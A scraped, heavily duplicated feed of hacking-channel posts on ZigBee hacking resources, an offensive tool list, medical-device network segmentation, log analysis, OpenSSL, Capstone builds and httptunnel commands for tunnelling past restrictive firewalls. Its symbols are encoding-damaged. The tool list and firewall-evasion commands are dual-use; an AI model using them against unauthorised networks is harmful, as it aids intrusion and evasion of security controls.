β β β Uππ»βΊπ«6π¬πβ β β β
π¦New Tips: #ZigBee Resources
Good explanation and introduction to Zigbee: http://resources.infosecinstitute.com/hacking-zigbee-networks/
KillerBee Presentation: http://www.willhackforsushi.com/presentations/toorcon11-wright.pdf
KillerBee Framework: https://github.com/riverloopsec/killerbee
The KillerBee framework is being expanded to support multiple devices. Currently there is support for the River Loop ApiMote, Atmel RZ RAVEN USB Stick, MoteIV Tmote Sky, TelosB mote, and Sewino Sniffer.
Open source hardware: https://github.com/riverloopsec/apimote
Attify ZigBee Framework GitHub Repo: https://github.com/attify/Attify-Zigbee-Framework
β 2020 git sources
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦New Tips: #ZigBee Resources
Good explanation and introduction to Zigbee: http://resources.infosecinstitute.com/hacking-zigbee-networks/
KillerBee Presentation: http://www.willhackforsushi.com/presentations/toorcon11-wright.pdf
KillerBee Framework: https://github.com/riverloopsec/killerbee
The KillerBee framework is being expanded to support multiple devices. Currently there is support for the River Loop ApiMote, Atmel RZ RAVEN USB Stick, MoteIV Tmote Sky, TelosB mote, and Sewino Sniffer.
Open source hardware: https://github.com/riverloopsec/apimote
Attify ZigBee Framework GitHub Repo: https://github.com/attify/Attify-Zigbee-Framework
β 2020 git sources
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Infosec Resources
Hacking ZigBee Networks
What is ZigBee? Internet of Things (IoT) is what most experts consider as the next step of the Internet revolution where physical objects are invariably
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 Only usefull Hacking tools #list 3 :
- BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything
- Attack Monitor - Endpoint Detection And Malware Analysis Software
- Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io
- SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool
- Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information
- Aztarna - A Footprinting Tool For Robots
- Hediye - Hash Generator & Cracker Online Offline
- Killcast - Manipulate Chromecast Devices In Your Network
- bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records
- WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack
- H8Mail - Email OSINT And Password Breach Hunting
- Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters
- Metasploit 5.0 - The WorldΓ’β¬β’s Most Used Penetration Testing Framework
- Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support
- Twifo-Cli - Get User Information Of A Twitter User
- Sitadel - Web Application Security Scanner
- Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)
- Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To
- Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies
- Shed - .NET Runtime Inspector
- Stardox - Github Stargazers Information Gathering Tool
β 2020 git sources
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦2020 Only usefull Hacking tools #list 3 :
- BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything
- Attack Monitor - Endpoint Detection And Malware Analysis Software
- Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io
- SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool
- Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information
- Aztarna - A Footprinting Tool For Robots
- Hediye - Hash Generator & Cracker Online Offline
- Killcast - Manipulate Chromecast Devices In Your Network
- bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records
- WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack
- H8Mail - Email OSINT And Password Breach Hunting
- Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters
- Metasploit 5.0 - The WorldΓ’β¬β’s Most Used Penetration Testing Framework
- Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support
- Twifo-Cli - Get User Information Of A Twitter User
- Sitadel - Web Application Security Scanner
- Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)
- Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To
- Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies
- Shed - .NET Runtime Inspector
- Stardox - Github Stargazers Information Gathering Tool
β 2020 git sources
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
KitPloit - PenTest & Hacking Tools
BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How medical equipment should resist hacker attacks ?
#News
For hospitals, the best way to prevent network attacks and protect IoMT devices from infection is to isolate the most vulnerable and critical devices from each other or maintain a virtual distance, which is called network segmentation.
Hospitals can take the following practical steps to segment clinical networks, reduce the attack surface, and protect patients from cyber attacks:
1οΈβ£First clear who is responsible
Traditionally, the safety of medical equipment has always been the responsibility of experts in biomedical engineering equipment.
> However, with the increasing popularity of IoMT devices and the increase of cyber attacks against healthcare, the IT team of the hospital information department had to invest more energy in medical device security. Therefore, there is a need for close cooperation between the information department and the biomedical engineering research team to design and implement safe and effective security policies for clinical networks.
>In order to ensure the safety of medical equipment and integrate IT and biomedical teams across departments, a separate, final IoMT cybersecurity policy decision maker is needed. Some large institutions have even added the role of medical equipment security officer (MDSO), which is directly responsible for the safety of medical equipment in the entire clinical network of the entire hospital.
2οΈβ£ Create a reliable equipment list
If you do not have a deep understanding of the medical equipment connected to the hospital, the configuration files on the equipment, and the communication mode, you cannot set a network segmentation strategy.
Automated inventory tools must also be able to perform continuous analysis of equipment while understanding the behavior, criticality, and vulnerability of IoMT equipment.
3οΈβ£ Assess the risk of each device
> The risk score should be calculated based on the criticality and medical impact of the equipment. The risk assessment should be carried out continuously, and the abnormal behavior of the network should be continuously monitored. In order to assess risk, the following factors must be considered:
> Communicate with external servers required for normal device function (i.e. vendor communication)
>The device needs to store and send ePHI, and for what purpose?
π³Device usage mode
Is the device running an unsupported operating system or are there any known vulnerabilities? If yes, do you use patches or network segmentation to protect the device?
4οΈβ£ Follow regulatory guidelines and rules in real time
If the hospital does not comply with federal and state regulatory standards, it will face millions of dollars in fines. Aside from the loss of money, failure to comply with cybersecurity guidelines puts medical equipment at risk and may endanger the safety of patients, business integrity, and the reputation of the hospital.
Guidelines and regulations concerning health care and medical equipment are regularly updated. To maintain compliance, hospitals must pay close attention to regulatory standards and updates issued by state federal agencies, including:
U.S. Food and Drug Administration (FDA)
Medical Device Information Sharing and Analysis (MDISS) Initiative
Health Insurance Portability and Accountability Act (HIPAA)
5οΈβ£Design, verify and execute segmentation strategies
Segmentation strategies are used to reduce the attack surface and prevent potential threats. Network segmentation can also help the network run more smoothly by restricting traffic to designated areas and reducing network load.
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How medical equipment should resist hacker attacks ?
#News
For hospitals, the best way to prevent network attacks and protect IoMT devices from infection is to isolate the most vulnerable and critical devices from each other or maintain a virtual distance, which is called network segmentation.
Hospitals can take the following practical steps to segment clinical networks, reduce the attack surface, and protect patients from cyber attacks:
1οΈβ£First clear who is responsible
Traditionally, the safety of medical equipment has always been the responsibility of experts in biomedical engineering equipment.
> However, with the increasing popularity of IoMT devices and the increase of cyber attacks against healthcare, the IT team of the hospital information department had to invest more energy in medical device security. Therefore, there is a need for close cooperation between the information department and the biomedical engineering research team to design and implement safe and effective security policies for clinical networks.
>In order to ensure the safety of medical equipment and integrate IT and biomedical teams across departments, a separate, final IoMT cybersecurity policy decision maker is needed. Some large institutions have even added the role of medical equipment security officer (MDSO), which is directly responsible for the safety of medical equipment in the entire clinical network of the entire hospital.
2οΈβ£ Create a reliable equipment list
If you do not have a deep understanding of the medical equipment connected to the hospital, the configuration files on the equipment, and the communication mode, you cannot set a network segmentation strategy.
Automated inventory tools must also be able to perform continuous analysis of equipment while understanding the behavior, criticality, and vulnerability of IoMT equipment.
3οΈβ£ Assess the risk of each device
> The risk score should be calculated based on the criticality and medical impact of the equipment. The risk assessment should be carried out continuously, and the abnormal behavior of the network should be continuously monitored. In order to assess risk, the following factors must be considered:
> Communicate with external servers required for normal device function (i.e. vendor communication)
>The device needs to store and send ePHI, and for what purpose?
π³Device usage mode
Is the device running an unsupported operating system or are there any known vulnerabilities? If yes, do you use patches or network segmentation to protect the device?
4οΈβ£ Follow regulatory guidelines and rules in real time
If the hospital does not comply with federal and state regulatory standards, it will face millions of dollars in fines. Aside from the loss of money, failure to comply with cybersecurity guidelines puts medical equipment at risk and may endanger the safety of patients, business integrity, and the reputation of the hospital.
Guidelines and regulations concerning health care and medical equipment are regularly updated. To maintain compliance, hospitals must pay close attention to regulatory standards and updates issued by state federal agencies, including:
U.S. Food and Drug Administration (FDA)
Medical Device Information Sharing and Analysis (MDISS) Initiative
Health Insurance Portability and Accountability Act (HIPAA)
5οΈβ£Design, verify and execute segmentation strategies
Segmentation strategies are used to reduce the attack surface and prevent potential threats. Network segmentation can also help the network run more smoothly by restricting traffic to designated areas and reducing network load.
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is Goaccess ? #term
GoAccess is a powerful Apache log analyzer, the program creates interactive reports that can be viewed in any browser. It works on both Linux and Windows. Suitable for general analysis of web server logs, for real-time monitoring of activity, or for analysis of certain aspects of activity or problems
π¦The following log formats and values are supported for the --log-format option :
π³COMBINED - combined journal format,
π³VCOMBINED - combined log format with a virtual host,
π³COMMON is a regular log format,
π³VCOMMON is a regular log format with a virtual host,
π³W3C is an extended W3C log format,
π³SQUID - Squid's native log format,
π³CLOUDFRONT - Amazon CloudFront Web Distribution,
π³CLOUDSTORAGE - Google Cloud Storage,
π³AWSELB - Amazon Elastic Load Balancing,
π³AWSS3 - Amazon Simple Storage Service (S3)
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is Goaccess ? #term
GoAccess is a powerful Apache log analyzer, the program creates interactive reports that can be viewed in any browser. It works on both Linux and Windows. Suitable for general analysis of web server logs, for real-time monitoring of activity, or for analysis of certain aspects of activity or problems
π¦The following log formats and values are supported for the --log-format option :
π³COMBINED - combined journal format,
π³VCOMBINED - combined log format with a virtual host,
π³COMMON is a regular log format,
π³VCOMMON is a regular log format with a virtual host,
π³W3C is an extended W3C log format,
π³SQUID - Squid's native log format,
π³CLOUDFRONT - Amazon CloudFront Web Distribution,
π³CLOUDSTORAGE - Google Cloud Storage,
π³AWSELB - Amazon Elastic Load Balancing,
π³AWSS3 - Amazon Simple Storage Service (S3)
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some interesting Termux/Linux #tool
> httptunnel creates a bidirectional virtual data path tunnelled in HTTP
requests. The requests can be sent via an HTTP proxy if so desired.
>This can be useful for users behind restrictive firewalls. If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/larsbrinkhoff/httptunnel.git
2οΈβ£cd httptunnel
3οΈβ£chmod 777 autogen.sh
4οΈβ£./autogen.sh
5οΈβ£EXAMPLES
π³ start httptunnel server:
1) At host REMOTE, start hts like this:
hts -F localhost:23 8888 (set up httptunnel server to listen on port 8888 and forward to localhost:23)
2) start httptunnel client:
At host LOCAL, start htc like this:
htc -F 2323 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 (set up httptunnel client to forward localhost:2323 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000)
3) or, if using a buffering HTTP proxy:
htc -F 2323 -P PROXY_ADDRESS:8000 -B 48K REMOTE_IP:8888
4) Now you can do this at host LOCAL:
telnet localhost 2323 (telnet in to REMOTE_IP:8888 via your httptunnel you just configured above on port localhost:2323)
...and you will hopefully get a login prompt from host REMOTE_IP.
π³Debugging:
5) For debug output, add -Dn to the end of a command, where n is the level of debug output you'd like to see, with 0 meaning no debug messages at all, and 5 being the highest level (verbose).
6) ex: htc -F 10001 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 -D5 will show verbose debug output (level 5 debugging) while setting up an httptunnel client to forward localhost:10001 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000
6οΈβ£Related Docs :
π³https://sergvergara.files.wordpress.com/2011/04/http_tunnel.pdf - excellent httptunnel tutorial, examples, & info
π³http://sebsauvage.net/punching/ - another excellent example
π³https://daniel.haxx.se/docs/sshproxy.html - more useful info
π³http://neophob.com/2006/10/gnu-httptunnel-v33-windows-binaries/ -
π³httptunnel Win32 binaries (download here)
π³Google search for "http tunnel v3.3" - brings up lots of good links to httptunnel (this search seems to work better than searching for "httptunnel" alone since the latter brings up many generic search results or results pertaining to other tools)
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
> httptunnel creates a bidirectional virtual data path tunnelled in HTTP
requests. The requests can be sent via an HTTP proxy if so desired.
>This can be useful for users behind restrictive firewalls. If WWW
access is allowed through an HTTP proxy, it's possible to use
httptunnel and, say, telnet or PPP to connect to a computer outside
the firewall.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/larsbrinkhoff/httptunnel.git
2οΈβ£cd httptunnel
3οΈβ£chmod 777 autogen.sh
4οΈβ£./autogen.sh
5οΈβ£EXAMPLES
π³ start httptunnel server:
1) At host REMOTE, start hts like this:
hts -F localhost:23 8888 (set up httptunnel server to listen on port 8888 and forward to localhost:23)
2) start httptunnel client:
At host LOCAL, start htc like this:
htc -F 2323 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 (set up httptunnel client to forward localhost:2323 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000)
3) or, if using a buffering HTTP proxy:
htc -F 2323 -P PROXY_ADDRESS:8000 -B 48K REMOTE_IP:8888
4) Now you can do this at host LOCAL:
telnet localhost 2323 (telnet in to REMOTE_IP:8888 via your httptunnel you just configured above on port localhost:2323)
...and you will hopefully get a login prompt from host REMOTE_IP.
π³Debugging:
5) For debug output, add -Dn to the end of a command, where n is the level of debug output you'd like to see, with 0 meaning no debug messages at all, and 5 being the highest level (verbose).
6) ex: htc -F 10001 -P PROXY_ADDRESS:8000 REMOTE_IP:8888 -D5 will show verbose debug output (level 5 debugging) while setting up an httptunnel client to forward localhost:10001 to REMOTE_IP:8888 via a local proxy at PROXY_ADDRESS:8000
6οΈβ£Related Docs :
π³https://sergvergara.files.wordpress.com/2011/04/http_tunnel.pdf - excellent httptunnel tutorial, examples, & info
π³http://sebsauvage.net/punching/ - another excellent example
π³https://daniel.haxx.se/docs/sshproxy.html - more useful info
π³http://neophob.com/2006/10/gnu-httptunnel-v33-windows-binaries/ -
π³httptunnel Win32 binaries (download here)
π³Google search for "http tunnel v3.3" - brings up lots of good links to httptunnel (this search seems to work better than searching for "httptunnel" alone since the latter brings up many generic search results or results pertaining to other tools)
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
larsbrinkhoff/httptunnel
Bidirectional data stream tunnelled in HTTP requests. - larsbrinkhoff/httptunnel
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Self-tuning VDS / VPS :
#FastTips
> VDS (or VPS, which is the same) - translates as βvirtual dedicated serverβ or βvirtual private serverβ. In simple words, this is a computer on which you can install any operating system, and in this operating system any programs. Another key feature of VDS is the presence of white IP.
> Pentester can use VDS for long scanning, for implementing attacks (as a DNS proxy, phishing web server, VPN server), for long-term information collection (creating a website mirror, working with a large number of sites or data), for anonymity (proxy, VPN server), for the exchange of information (mail server, web server, environments for mutual work and file sharing, hidden Tor services and much more), as a target for attacks (you can install vulnerable applications, vulnerable sites for training skills), for training defense skills and analysis of attacks and the consequences of compromise.
> The material selection currently includes instructions for Arch Linux. In the near future, similar instructions will appear for Debian and Ubuntu. The range of issues addressed will also be greatly expanded.
>Most of the instructions describe the configuration inside VDS, and they are identical no matter where you purchased the server. The exceptions are instructions describing the process of installing the OS and the process of making a DNS record about a domain name. These instructions are made on the example of one Russian hoster (selected for low cost) and one foreign hoster (to be added soon).
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Self-tuning VDS / VPS :
#FastTips
> VDS (or VPS, which is the same) - translates as βvirtual dedicated serverβ or βvirtual private serverβ. In simple words, this is a computer on which you can install any operating system, and in this operating system any programs. Another key feature of VDS is the presence of white IP.
> Pentester can use VDS for long scanning, for implementing attacks (as a DNS proxy, phishing web server, VPN server), for long-term information collection (creating a website mirror, working with a large number of sites or data), for anonymity (proxy, VPN server), for the exchange of information (mail server, web server, environments for mutual work and file sharing, hidden Tor services and much more), as a target for attacks (you can install vulnerable applications, vulnerable sites for training skills), for training defense skills and analysis of attacks and the consequences of compromise.
> The material selection currently includes instructions for Arch Linux. In the near future, similar instructions will appear for Debian and Ubuntu. The range of issues addressed will also be greatly expanded.
>Most of the instructions describe the configuration inside VDS, and they are identical no matter where you purchased the server. The exceptions are instructions describing the process of installing the OS and the process of making a DNS record about a domain name. These instructions are made on the example of one Russian hoster (selected for low cost) and one foreign hoster (to be added soon).
enjoyβ€οΈππ»
β Topic git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Google was sued by the Arizona Attorney General for alleged fraud
#News
> According to foreign media reports, on Wednesday , local time, Google was sued by Arizona Attorney General Mark Brnovich, who accused the search giant of deceiving users and collecting location data from their mobile phones. We know that the vast majority of Googleβs revenue comes from its huge advertising business, and the personal information that Google collects when users use its products provides support for it.
> In this regard, Brnovich posted on Twitter that the user was deceived by a false sense of security because Google made the user think that they disabled the location data collection settings, but in fact these settings are still turned on. The lawsuit requires Google to provide damages, but the exact amount is unclear. Brnovich's office also did not respond to requests for comment.
>Google has defended its policy on location data in a statement. Spokesperson Jose Castaneda said: "The Attorney General and the lawyers who charge for litigation seem to have wrongly described our services. We have always built privacy features into our products and provided strong control over location data. We look forward to clarifying the facts. "
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Google was sued by the Arizona Attorney General for alleged fraud
#News
> According to foreign media reports, on Wednesday , local time, Google was sued by Arizona Attorney General Mark Brnovich, who accused the search giant of deceiving users and collecting location data from their mobile phones. We know that the vast majority of Googleβs revenue comes from its huge advertising business, and the personal information that Google collects when users use its products provides support for it.
> In this regard, Brnovich posted on Twitter that the user was deceived by a false sense of security because Google made the user think that they disabled the location data collection settings, but in fact these settings are still turned on. The lawsuit requires Google to provide damages, but the exact amount is unclear. Brnovich's office also did not respond to requests for comment.
>Google has defended its policy on location data in a statement. Spokesperson Jose Castaneda said: "The Attorney General and the lawyers who charge for litigation seem to have wrongly described our services. We have always built privacy features into our products and provided strong control over location data. We look forward to clarifying the facts. "
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is OpenSSL and what is it used for ?
OpenSSL is a cryptographic toolkit that implements the Secure Sockets Layer (SSL v2 / v3) and Transport Layer Security (TLS v1) network protocols and their corresponding cryptography standards.
The openssl program is a command-line tool for using various cryptographic functions of the OpenSSL cryptographic library in the console. Main features:
1) Create and manage private keys, public keys and parameters.
2) Public Key Cryptographic Operations
3) Create X.509, CSR, and CRL certificates
4) Message Digest Calculation
5) Encryption and decryption using ciphers
6) Client / Server SSL / TLS Tests
7) S / MIME signed or encrypted mail processing
8) Time stamp requests, generation and validation
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is OpenSSL and what is it used for ?
OpenSSL is a cryptographic toolkit that implements the Secure Sockets Layer (SSL v2 / v3) and Transport Layer Security (TLS v1) network protocols and their corresponding cryptography standards.
The openssl program is a command-line tool for using various cryptographic functions of the OpenSSL cryptographic library in the console. Main features:
1) Create and manage private keys, public keys and parameters.
2) Public Key Cryptographic Operations
3) Create X.509, CSR, and CRL certificates
4) Message Digest Calculation
5) Encryption and decryption using ciphers
6) Client / Server SSL / TLS Tests
7) S / MIME signed or encrypted mail processing
8) Time stamp requests, generation and validation
share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TERMUX-LINUX 2020
#prohack
Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.
π¦FEATURES :
Support multiple hardware architectures: ARM, ARM64 (ARMv8), Ethereum VM, M68K, Mips, MOS65XX, PPC, Sparc, SystemZ, TMS320C64X, M680X, XCore and X86 (including X86_64).
Having clean/simple/lightweight/intuitive architecture-neutral API.
Provide details on disassembled instruction (called βdecomposerβ by others).
Provide semantics of the disassembled instruction, such as list of implicit registers read & written.
Implemented in pure C language, with lightweight bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Emacs, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala (ready either in main code, or provided externally by the community).
Native support for all popular platforms: Windows, Mac OSX, iOS, Android, Linux, *BSD, Solaris, etc.
Thread-safe by design.
Special support for embedding into firmware or OS kernel.
High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
(1) Compile from source
On *nix (such as MacOSX, Linux, *BSD, Solaris):
- To compile for current platform, run:
$ ./make.sh
- On 64-bit OS, run the command below to cross-compile Capstone for 32-bit binary:
$ ./make.sh nix32
(2) Install Capstone on *nix
To install Capstone, run:
$ sudo ./make.sh install
For FreeBSD/OpenBSD, where sudo is unavailable, run:
$ su; ./make.sh install
Users are then required to enter root password to copy Capstone into machine
system directories.
Afterwards, run ./tests/test* to see the tests disassembling sample code.
NOTE: The core framework installed by "./make.sh install" consist of
following files:
/usr/include/capstone/arm.h
/usr/include/capstone/arm64.h
/usr/include/capstone/capstone.h
/usr/include/capstone/evm.h
/usr/include/capstone/m680x.h
/usr/include/capstone/m68k.h
/usr/include/capstone/mips.h
/usr/include/capstone/mos65xx.h
/usr/include/capstone/platform.h
/usr/include/capstone/ppc.h
/usr/include/capstone/sparc.h
/usr/include/capstone/systemz.h
/usr/include/capstone/tms320c64x.h
/usr/include/capstone/x86.h
/usr/include/capstone/xcore.h
/usr/lib/libcapstone.a
/usr/lib/libcapstone.so (for Linux/*nix), or /usr/lib/libcapstone.dylib (OSX)
(3) Cross-compile for Windows from *nix
To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64
for 64-bit binaries) are required.
- To cross-compile Windows 32-bit binary, simply run:
$ ./make.sh cross-win32
- To cross-compile Windows 64-bit binary, run:
$ ./make.sh cross-win64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(4) Cross-compile for iOS from Mac OSX.
To cross-compile for iOS (iPhone/iPad/iPod), Mac OSX with XCode installed is required.
- To cross-compile for ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run:
$ ./make.sh ios_armv7
- To cross-compile for ArmV7s (iPad 4, iPhone 5C, iPad mini), run:
$ ./make.sh ios_armv7s
- To cross-compile for Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run:
$ ./make.sh ios_arm64
- To cross-compile for all iDevices (armv7 + armv7s + arm64), run:
$ ./make.sh ios
Resulted files libcapstone.dylib, libcapstone.a & tests/test* can then
be used on iOS devices.
(5) Cross-compile for Android
To cross-compile for Android (smartphone/tablet), Android NDK is required.
NOTE: Only ARM and ARM64 are currently supported.
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm
or
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm64
Resulted files libcapstone.so, libcapstone.a & tests/test* can then
be used on Android devices.
(6) Compile on Windows with Cygwin
π¦TERMUX-LINUX 2020
#prohack
Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community.
π¦FEATURES :
Support multiple hardware architectures: ARM, ARM64 (ARMv8), Ethereum VM, M68K, Mips, MOS65XX, PPC, Sparc, SystemZ, TMS320C64X, M680X, XCore and X86 (including X86_64).
Having clean/simple/lightweight/intuitive architecture-neutral API.
Provide details on disassembled instruction (called βdecomposerβ by others).
Provide semantics of the disassembled instruction, such as list of implicit registers read & written.
Implemented in pure C language, with lightweight bindings for D, Clojure, F#, Common Lisp, Visual Basic, PHP, PowerShell, Emacs, Haskell, Perl, Python, Ruby, C#, NodeJS, Java, GO, C++, OCaml, Lua, Rust, Delphi, Free Pascal & Vala (ready either in main code, or provided externally by the community).
Native support for all popular platforms: Windows, Mac OSX, iOS, Android, Linux, *BSD, Solaris, etc.
Thread-safe by design.
Special support for embedding into firmware or OS kernel.
High performance & suitable for malware analysis (capable of handling various X86 malware tricks).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
(1) Compile from source
On *nix (such as MacOSX, Linux, *BSD, Solaris):
- To compile for current platform, run:
$ ./make.sh
- On 64-bit OS, run the command below to cross-compile Capstone for 32-bit binary:
$ ./make.sh nix32
(2) Install Capstone on *nix
To install Capstone, run:
$ sudo ./make.sh install
For FreeBSD/OpenBSD, where sudo is unavailable, run:
$ su; ./make.sh install
Users are then required to enter root password to copy Capstone into machine
system directories.
Afterwards, run ./tests/test* to see the tests disassembling sample code.
NOTE: The core framework installed by "./make.sh install" consist of
following files:
/usr/include/capstone/arm.h
/usr/include/capstone/arm64.h
/usr/include/capstone/capstone.h
/usr/include/capstone/evm.h
/usr/include/capstone/m680x.h
/usr/include/capstone/m68k.h
/usr/include/capstone/mips.h
/usr/include/capstone/mos65xx.h
/usr/include/capstone/platform.h
/usr/include/capstone/ppc.h
/usr/include/capstone/sparc.h
/usr/include/capstone/systemz.h
/usr/include/capstone/tms320c64x.h
/usr/include/capstone/x86.h
/usr/include/capstone/xcore.h
/usr/lib/libcapstone.a
/usr/lib/libcapstone.so (for Linux/*nix), or /usr/lib/libcapstone.dylib (OSX)
(3) Cross-compile for Windows from *nix
To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64
for 64-bit binaries) are required.
- To cross-compile Windows 32-bit binary, simply run:
$ ./make.sh cross-win32
- To cross-compile Windows 64-bit binary, run:
$ ./make.sh cross-win64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(4) Cross-compile for iOS from Mac OSX.
To cross-compile for iOS (iPhone/iPad/iPod), Mac OSX with XCode installed is required.
- To cross-compile for ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run:
$ ./make.sh ios_armv7
- To cross-compile for ArmV7s (iPad 4, iPhone 5C, iPad mini), run:
$ ./make.sh ios_armv7s
- To cross-compile for Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run:
$ ./make.sh ios_arm64
- To cross-compile for all iDevices (armv7 + armv7s + arm64), run:
$ ./make.sh ios
Resulted files libcapstone.dylib, libcapstone.a & tests/test* can then
be used on iOS devices.
(5) Cross-compile for Android
To cross-compile for Android (smartphone/tablet), Android NDK is required.
NOTE: Only ARM and ARM64 are currently supported.
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm
or
$ NDK=/android/android-ndk-r10e ./make.sh cross-android arm64
Resulted files libcapstone.so, libcapstone.a & tests/test* can then
be used on Android devices.
(6) Compile on Windows with Cygwin
To compile under Cygwin gcc-mingw-w64-i686 or x86_64-w64-mingw32 run:
- To compile Windows 32-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw32
- To compile Windows 64-bit binary under Cygwin, run:
$ ./make.sh cygwin-mingw64
Resulted files libcapstone.dll, libcapstone.dll.a & tests/test*.exe can then
be used on Windows machine.
(7) By default, "cc" (default C compiler on the system) is used as compiler.
- To use "clang" compiler instead, run the command below:
$ ./make.sh clang
- To use "gcc" compiler instead, run:
$ ./make.sh gcc
(8) To uninstall Capstone, run the command below:
$ sudo ./make.sh uninstall
(9) Language bindings
So far, Python, Ocaml & Java are supported by bindings in the main code.
Look for the bindings under directory bindings/, and refer to README file
of corresponding languages.
Community also provide bindings for C#, Go, Ruby, NodeJS, C++ & Vala. Links to
these can be found at address http://capstone-engine.org/download.html
Enjoyβ€οΈππ»
β 2020 git sources
